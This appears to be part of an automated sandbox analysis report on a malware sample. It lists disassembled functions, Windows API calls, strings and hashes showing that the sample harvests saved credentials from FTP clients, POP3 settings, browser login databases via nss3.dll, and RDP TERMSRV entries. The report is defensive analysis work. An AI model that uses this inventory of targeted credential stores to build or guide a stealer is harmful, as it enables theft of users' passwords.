                                                • String ID: GetNativeSystemInfo$IsWow64Process$kernel32.dll
                                                • API String ID: 977827838-3073145729
                                                • Opcode ID: acc38963b47003fc72c1d394741c902fac3bd37538990a04b0c4750c7232af4d
                                                • Instruction ID: e957a28dad8f20bd674ca0597af700fff60833ef583d508b9e18f8da30b21fec
                                                • Opcode Fuzzy Hash: acc38963b47003fc72c1d394741c902fac3bd37538990a04b0c4750c7232af4d
                                                • Instruction Fuzzy Hash: 45F05BB2700605A7C71061F56D85BDF25988BC03A8F341537FA15E22C2F9FCCD814168
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2922461256.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.2922449353.0000000000400000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2922477484.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2922489660.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_8WgZHDQckx.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID:
                                                • String ID: <setting name="$value="
                                                • API String ID: 0-3468128162
                                                • Opcode ID: 85fc4477013f91673bacdd8b9f18368d1d50f6049be21e76f691ec165c48f192
                                                • Instruction ID: 343984eb6a9c56387b750bf0dc89e658c7d3f05e65578c32d84a2233ccce9ec0
                                                • Opcode Fuzzy Hash: 85fc4477013f91673bacdd8b9f18368d1d50f6049be21e76f691ec165c48f192
                                                • Instruction Fuzzy Hash: 7731C171D04149ABCF11ABE08C41AFEBFB59F1A354F140067E804B72A1E27D4A44DBAE
                                                APIs
                                                • CreateFileA.KERNEL32(?,80000000,00000003,00000000,00000003,00000000,00000000), ref: 00401E65
                                                • GetFileSize.KERNEL32(00000001,00000000,?,80000000,00000003,00000000,00000003,00000000,00000000), ref: 00401E72
                                                • CreateFileMappingA.KERNEL32(?,00000000,00000002,00000000,00000000,00000000), ref: 00401E86
                                                • MapViewOfFile.KERNEL32(00000000,00000004,00000000,00000000,00000000,00000001,00000000,?,80000000,00000003,00000000,00000003,00000000,00000000), ref: 00401E9B
                                                • CloseHandle.KERNEL32(?,00000000,00000004,00000000,00000000,00000000,00000001,00000000,?,80000000,00000003,00000000,00000003,00000000,00000000), ref: 00401EAA
                                                • CloseHandle.KERNEL32(?,?,00000000,00000004,00000000,00000000,00000000,00000001,00000000,?,80000000,00000003,00000000,00000003,00000000,00000000), ref: 00401EB1
                                                • CloseHandle.KERNEL32(?,00000001,00000000,?,80000000,00000003,00000000,00000003,00000000,00000000), ref: 00401EC0
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2922461256.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.2922449353.0000000000400000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2922477484.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2922489660.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_8WgZHDQckx.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: File$CloseHandle$Create$MappingSizeView
                                                • String ID:
                                                • API String ID: 3733816638-0
                                                • Opcode ID: 8e23c6091eb8b8d46222d4bd7a16ced24ceefb6a7b190282a42a8e05d4c96427
                                                • Instruction ID: e58b99f9114672f5a439125ee997312c2d25841e4d564c066b43b0378391f37c
                                                • Opcode Fuzzy Hash: 8e23c6091eb8b8d46222d4bd7a16ced24ceefb6a7b190282a42a8e05d4c96427
                                                • Instruction Fuzzy Hash: C9117570290305BBEB312F31CC83F493A94AB01B14F208566BA24BD1E6D6F895918A6C
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2922461256.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.2922449353.0000000000400000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2922477484.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2922489660.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_8WgZHDQckx.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID:
                                                • String ID: ftp://$http://$https://
                                                • API String ID: 0-2804853444
                                                • Opcode ID: ae7cefc7c5333987e4983cd71e008bcbb42f508cd32fa06e4d6a3deba0beb9bf
                                                • Instruction ID: bc3b6236dd6c4818a11e2f1327c3646a8c10a5fbccc1043460bbed407a2be996
                                                • Opcode Fuzzy Hash: ae7cefc7c5333987e4983cd71e008bcbb42f508cd32fa06e4d6a3deba0beb9bf
                                                • Instruction Fuzzy Hash: CE61F631800109FEDF11AF91CE45AEEBBB9EF00348F10847BB841B51A1DB799B95DB98
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2922461256.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.2922449353.0000000000400000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2922477484.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2922489660.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_8WgZHDQckx.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID:
                                                • String ID: "/>$winex="
                                                • API String ID: 0-1498080979
                                                • Opcode ID: c4fe823f2cac692202bec1350e861c86fd880d6b9e02f36f7005e6d626db0ef5
                                                • Instruction ID: af0296e32a02ec1832d24190b1df8dde27091d9c0628ece5b9ff4e530f53491d
                                                • Opcode Fuzzy Hash: c4fe823f2cac692202bec1350e861c86fd880d6b9e02f36f7005e6d626db0ef5
                                                • Instruction Fuzzy Hash: 60314D32D0001ABACF11BBA2CC02DFE7E76AF45344F10843BF501B51B1D7BA5A61AB69
                                                APIs
                                                • StrStrIA.SHLWAPI(0084DAA8,FTPCON), ref: 00407FD5
                                                • StrStrIA.SHLWAPI(00849868,FTP CONTROL,00000000,0084DAA8,FTPCON), ref: 00407FE1
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2922461256.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.2922449353.0000000000400000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2922477484.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2922489660.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_8WgZHDQckx.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID:
                                                • String ID: .prf$FTP CONTROL$FTPCON$\Profiles
                                                • API String ID: 0-2908215140
                                                • Opcode ID: 903f4a60e5a0711024b0bf041507eda164574e85d0a12bddf26d445a3aad8b10
                                                • Instruction ID: 1db41b6092523eeb3e5549db4c42731596d2224b18425ab2775985076d95af50
                                                • Opcode Fuzzy Hash: 903f4a60e5a0711024b0bf041507eda164574e85d0a12bddf26d445a3aad8b10
                                                • Instruction Fuzzy Hash: 1001F534500645BAEB216B719C06FEF3E599BC1364F24803FF940B61E2EB7C5A8187AC
                                                APIs
                                                • GetHGlobalFromStream.OLE32(?,?), ref: 00401A22
                                                • GlobalLock.KERNEL32(?), ref: 00401A3D
                                                  • Part of subcall function 004018B7: LocalAlloc.KERNEL32(00000040,00402272,?,004022F2,?), ref: 004018C5
                                                • GlobalUnlock.KERNEL32(?), ref: 00401A65
                                                • lstrlenA.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 00401A6D
                                                  • Part of subcall function 004018A0: LocalFree.KERNEL32(00000000,?,00402319,?,?,?,?,?,?), ref: 004018AC
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2922461256.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.2922449353.0000000000400000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2922477484.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2922489660.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_8WgZHDQckx.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: Global$Local$AllocFreeFromLockStreamUnlocklstrlen
                                                • String ID: CRYPTED0YUI1.0
                                                • API String ID: 4083238039-1217275205
                                                • Opcode ID: 696191aca67fa8083aed78348175aa6b89b6b0cdf945d27bbe9b8f0f11fd5a0f
                                                • Instruction ID: 98bcc138fbcbd12d775f64776052211cb7bb3b8618e054945259ba3bf34ac07e
                                                • Opcode Fuzzy Hash: 696191aca67fa8083aed78348175aa6b89b6b0cdf945d27bbe9b8f0f11fd5a0f
                                                • Instruction Fuzzy Hash: E5119775D0010DBBDF026FA5CC429DD7F76AF04348F00817AB914B51B2D77A9BA1AB48
                                                APIs
                                                • GetHGlobalFromStream.OLE32(?,?,0040F8C0), ref: 0040F8D0
                                                • GlobalLock.KERNEL32(?), ref: 0040F8F1
                                                • GlobalUnlock.KERNEL32(?), ref: 0040F909
                                                • StrStrIA.SHLWAPI(00000000,STATUS-IMPORT-OK,?,?,?,0040F8C0), ref: 0040F924
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2922461256.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.2922449353.0000000000400000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2922477484.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2922489660.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_8WgZHDQckx.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: Global$FromLockStreamUnlock
                                                • String ID: STATUS-IMPORT-OK
                                                • API String ID: 2287449323-1591331578
                                                • Opcode ID: b7a0542db59541cbd688e6c800188e2b8ff4d7a3e93fbdfba6f53aa871c2d75f
                                                • Instruction ID: 99e17a3ffb2fc76985182a1eef3f698a9ca92f73e5691754bebca3514352fc79
                                                • Opcode Fuzzy Hash: b7a0542db59541cbd688e6c800188e2b8ff4d7a3e93fbdfba6f53aa871c2d75f
                                                • Instruction Fuzzy Hash: 72015B71D0420CBBEF117BA2CD42A9D7B35AB01348F1081BBB850B11B2DA798A959B18
                                                APIs
                                                  • Part of subcall function 00401C3F: lstrlenA.KERNEL32(?), ref: 00401C60
                                                  • Part of subcall function 00401C3F: lstrlenA.KERNEL32(00000000,?), ref: 00401C6A
                                                  • Part of subcall function 00401C3F: lstrcpyA.KERNEL32(00000000,?,00000000,00000000,?), ref: 00401C7E
                                                  • Part of subcall function 00401C3F: lstrcatA.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,?), ref: 00401C87
                                                • lstrlenA.KERNEL32(?), ref: 00402286
                                                • StrStrIA.SHLWAPI(00000000,.exe,?), ref: 004022A5
                                                • StrRChrIA.SHLWAPI(00000000,00000000,0000005C,00000000,.exe,?), ref: 004022B7
                                                • lstrlenA.KERNEL32(00000000,00000000,00000000,0000005C,00000000,.exe,?), ref: 004022C9
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2922461256.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.2922449353.0000000000400000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2922477484.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2922489660.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_8WgZHDQckx.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: lstrlen$lstrcatlstrcpy
                                                • String ID: .exe
                                                • API String ID: 2414487701-4119554291
                                                • Opcode ID: 1ad7d085a072468b6d331938eaeb98d3711b458085cd2767c3abbbd9018f3922
                                                • Instruction ID: 99d6b5c4ff29a8655c641b4fbf9fa7f465aefd9e6f15d593fc49ab49046486e9
                                                • Opcode Fuzzy Hash: 1ad7d085a072468b6d331938eaeb98d3711b458085cd2767c3abbbd9018f3922
                                                • Instruction Fuzzy Hash: 23F0C83120428579E72262659D09FAF7F969B93744F24417FF500B62C2DBFCD881927E
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2922461256.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.2922449353.0000000000400000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2922477484.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2922489660.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_8WgZHDQckx.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID:
                                                • String ID: <POP3_Password2
                                                • API String ID: 0-2923094552
                                                • Opcode ID: 5a60e8d4aa9b4c6c231a7d7f2169547f2d22742aa13a31f4361e0a4d5794f19f
                                                • Instruction ID: d6a89ab45ed27c45d4ded46e627d1494df84bfbb3cef63ef7ca6208d75a2edca
                                                • Opcode Fuzzy Hash: 5a60e8d4aa9b4c6c231a7d7f2169547f2d22742aa13a31f4361e0a4d5794f19f
                                                • Instruction Fuzzy Hash: 3A412E31900019FEDF12ABA2CD018EE7E76AF48358F144937F501B51F1E7798E61ABA9
                                                APIs
                                                • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000001,00000000,00000000,00000000,00000000,?), ref: 0040CBC6
                                                • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000001,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000001,00000000,00000000,00000000), ref: 0040CBEC
                                                • StrStrIA.SHLWAPI(00000000,00000000,00000000,00000000,00000000,00000001,00000000,00000000,00000000,00000000,?), ref: 0040CC10
                                                • lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000001,00000000,00000000,00000000,00000000,?), ref: 0040CC32
                                                  • Part of subcall function 004018A0: LocalFree.KERNEL32(00000000,?,00402319,?,?,?,?,?,?), ref: 004018AC
                                                • lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000001,00000000,00000000,00000000,00000000,?), ref: 0040CC1D
                                                  • Part of subcall function 004018B7: LocalAlloc.KERNEL32(00000040,00402272,?,004022F2,?), ref: 004018C5
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2922461256.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.2922449353.0000000000400000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2922477484.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2922489660.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_8WgZHDQckx.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: ByteCharLocalMultiWidelstrlen$AllocFree
                                                • String ID:
                                                • API String ID: 1890766102-0
                                                • Opcode ID: 934b97756b6a700027879f897ee5652c65a55fe5b21a80c67ea77db47f541946
                                                • Instruction ID: 7ab95b7534d6579ed3b9767e0ae932743c93dee75aa345241b3a12643bdaad8a
                                                • Opcode Fuzzy Hash: 934b97756b6a700027879f897ee5652c65a55fe5b21a80c67ea77db47f541946
                                                • Instruction Fuzzy Hash: 52216F71D44208FFFF116BA1CC86F9E7F75AB04314F20816AB214B91E1D7BD5A909B68
                                                APIs
                                                • StrStrIA.SHLWAPI(00849868,FTP Navigator), ref: 00405A2F
                                                • StrStrIA.SHLWAPI(00849868,FTP Commander,00849868,FTP Navigator), ref: 00405A5D
                                                  • Part of subcall function 00402272: lstrlenA.KERNEL32(?), ref: 00402286
                                                  • Part of subcall function 00402272: StrStrIA.SHLWAPI(00000000,.exe,?), ref: 004022A5
                                                  • Part of subcall function 00402272: StrRChrIA.SHLWAPI(00000000,00000000,0000005C,00000000,.exe,?), ref: 004022B7
                                                  • Part of subcall function 00402272: lstrlenA.KERNEL32(00000000,00000000,00000000,0000005C,00000000,.exe,?), ref: 004022C9
                                                  • Part of subcall function 004018A0: LocalFree.KERNEL32(00000000,?,00402319,?,?,?,?,?,?), ref: 004018AC
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2922461256.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.2922449353.0000000000400000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2922477484.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2922489660.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_8WgZHDQckx.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: lstrlen$FreeLocal
                                                • String ID: FTP Commander$FTP Navigator$ftplist.txt
                                                • API String ID: 1884169789-2424314702
                                                • Opcode ID: 9d5b637c61ab1114d0ce4eb36c77c0bcf70d746fd6fefb9aba9394ac61cb4a81
                                                • Instruction ID: 2606a662c771ff84f1f1ce6f5f2d3131c1d725aa632879f6ecdcb132b5d4d674
                                                • Opcode Fuzzy Hash: 9d5b637c61ab1114d0ce4eb36c77c0bcf70d746fd6fefb9aba9394ac61cb4a81
                                                • Instruction Fuzzy Hash: 9B01C270600505BAEB1177618C42FBF2E59DFC1354F64423BB904B11E2DB7C5E818EAC
                                                APIs
                                                • StrStrIA.SHLWAPI(0084DAA8,FTPNow), ref: 0040CE42
                                                • StrStrIA.SHLWAPI(0084DAA8,FTP Now,0084DAA8,FTPNow), ref: 0040CE53
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2922461256.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.2922449353.0000000000400000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2922477484.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2922489660.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_8WgZHDQckx.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID:
                                                • String ID: FTP Now$FTPNow$sites.xml
                                                • API String ID: 0-284577462
                                                • Opcode ID: 837970b7f3a7f33189b44552e6bb287dfb3a738f6fccdb254c5c762cef329e91
                                                • Instruction ID: 2c7ace2f0d9e2418dd89fab9b5f8ad072c5ad762fb88618161294aac38493c12
                                                • Opcode Fuzzy Hash: 837970b7f3a7f33189b44552e6bb287dfb3a738f6fccdb254c5c762cef329e91
                                                • Instruction Fuzzy Hash: 9AF0F470600105B9DB217B71CC42FAF3E664B91754F24033BB918B11E2EBBCCA8196AD
                                                APIs
                                                • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 0040C3D2
                                                • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,?,?,00000000,00000000,?,000000FF,00000000,00000000), ref: 0040C3F4
                                                • StgOpenStorage.OLE32(?,00000000,00000012,00000000,00000000,?,00000000,00000000,?,000000FF,?,?,?,00000000,00000000,?), ref: 0040C408
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2922461256.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.2922449353.0000000000400000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2922477484.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2922489660.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_8WgZHDQckx.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: ByteCharMultiWide$OpenStorage
                                                • String ID: Settings
                                                • API String ID: 2489594185-473154195
                                                • Opcode ID: df1517b52f5387b7e8eabdb854df1a542840954afb3b0f9fafc82675fdbed2bf
                                                • Instruction ID: d5202654d815c8f565cfe6d5d5c0b11c79c1bb76e693376a13619458c3235ccb
                                                • Opcode Fuzzy Hash: df1517b52f5387b7e8eabdb854df1a542840954afb3b0f9fafc82675fdbed2bf
                                                • Instruction Fuzzy Hash: 9731BB3194020AFBEF11AFA1CC42FAEBB76BF44704F208266B610791F1D6759A50AB58
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2922461256.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.2922449353.0000000000400000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2922477484.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2922489660.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_8WgZHDQckx.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID:
                                                • String ID: http://$https://
                                                • API String ID: 0-1916535328
                                                • Opcode ID: f69da22e727eef104b2cf716d0f35fe463af5b0edc555dda030fea459c2287d6
                                                • Instruction ID: b2a289f5b0d080ed68cf2337ec435f1deb2b55825455c811ff8f7ecc687744aa
                                                • Opcode Fuzzy Hash: f69da22e727eef104b2cf716d0f35fe463af5b0edc555dda030fea459c2287d6
                                                • Instruction Fuzzy Hash: D041F431800109FADF12AF91DE45BDE7B72AF40308F10817AF951791E1DB798BA0EB59
                                                APIs
                                                • lstrcmpiA.KERNEL32(00000000,logins), ref: 0040BC74
                                                • lstrcmpA.KERNEL32(table,?,00000000,logins,?), ref: 0040BCA9
                                                  • Part of subcall function 0040B922: StrStrIA.SHLWAPI(?,() ), ref: 0040B932
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2922461256.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.2922449353.0000000000400000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2922477484.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2922489660.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_8WgZHDQckx.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: lstrcmplstrcmpi
                                                • String ID: logins$table
                                                • API String ID: 3524194181-3800951466
                                                • Opcode ID: ada207dc7e3c7ca5c0c09c600882fe7f942b93184df616c64510a39bd239a3fa
                                                • Instruction ID: c54da1691fe375ca86dbfa03df4fd5b1e0be1de1bd419b8b10778630d9f833a2
                                                • Opcode Fuzzy Hash: ada207dc7e3c7ca5c0c09c600882fe7f942b93184df616c64510a39bd239a3fa
                                                • Instruction Fuzzy Hash: 3131B579800209FACF21EF90DC55EDEBB79EF04324F10837BA620B11E0D7799A559B98
                                                APIs
                                                  • Part of subcall function 004015B3: lstrlenA.KERNEL32(00000000), ref: 004015BF
                                                • StrStrIA.SHLWAPI(?,0041683E), ref: 0040CA93
                                                • lstrlenA.KERNEL32(TERMSRV/,?,0041683E), ref: 0040CAA1
                                                • StrStrIA.SHLWAPI(?,TERMSRV/,TERMSRV/,?,0041683E), ref: 0040CAB1
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2922461256.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.2922449353.0000000000400000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2922477484.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2922489660.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_8WgZHDQckx.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: lstrlen
                                                • String ID: TERMSRV/
                                                • API String ID: 1659193697-3001602198
                                                • Opcode ID: 99450d30486c2eb03ae9dc29bfeb121ac5eaf57037d9eab8a0d8777cbe7db27c
                                                • Instruction ID: b5c285d364a74a17aa2f03974f6d7f612088cde8f552527b4e4b1305b52b2a27
                                                • Opcode Fuzzy Hash: 99450d30486c2eb03ae9dc29bfeb121ac5eaf57037d9eab8a0d8777cbe7db27c
                                                • Instruction Fuzzy Hash: 9811953141010DFBCF026F65DD829DE3E22AF44358B104526BD15781F1DB7ADAA1AB98
                                                APIs
                                                • lstrlenA.KERNEL32(?), ref: 00408EAE
                                                • SetCurrentDirectoryA.KERNEL32(?,?), ref: 00408ECF
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2922461256.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.2922449353.0000000000400000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2922477484.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2922489660.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_8WgZHDQckx.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: CurrentDirectorylstrlen
                                                • String ID: nss3.dll
                                                • API String ID: 2713697268-2492180550
                                                • Opcode ID: 851c47be65f8092ccf3457e7c8ffd1bf4d804a9e1797c66cabd9e43c28dc92eb
                                                • Instruction ID: 491879525ea8b5a8555be9e261d62592d027b06e261381b9593375468cf32869
                                                • Opcode Fuzzy Hash: 851c47be65f8092ccf3457e7c8ffd1bf4d804a9e1797c66cabd9e43c28dc92eb
                                                • Instruction Fuzzy Hash: E9116130610106EFDB106F70EE49BDA3FA2EB54345F12D03BE445A42A1DBB98896964E
                                                APIs
                                                • CredEnumerateA.ADVAPI32(TERMSRV/*,00000000,00000000,00000000), ref: 0040CB44
                                                • CredFree.ADVAPI32(00000000), ref: 0040CB8B
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2922461256.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.2922449353.0000000000400000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2922477484.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2922489660.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_8WgZHDQckx.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: Cred$EnumerateFree
                                                • String ID: TERMSRV/*
                                                • API String ID: 3403564193-275249402
                                                • Opcode ID: 0a76474207689e83440903aedac80fd9e73f65f2b0a6c9f942653d54e950e88d
                                                • Instruction ID: cd8640c4fb038548bc10826c1b83c39122f29a07020e5201283a44a26fc7190e
                                                • Opcode Fuzzy Hash: 0a76474207689e83440903aedac80fd9e73f65f2b0a6c9f942653d54e950e88d
                                                • Instruction Fuzzy Hash: 64115B31400209EBDF219F88E88ABDEB7B4EB04304F14867AD541721E1C379BAD4EB99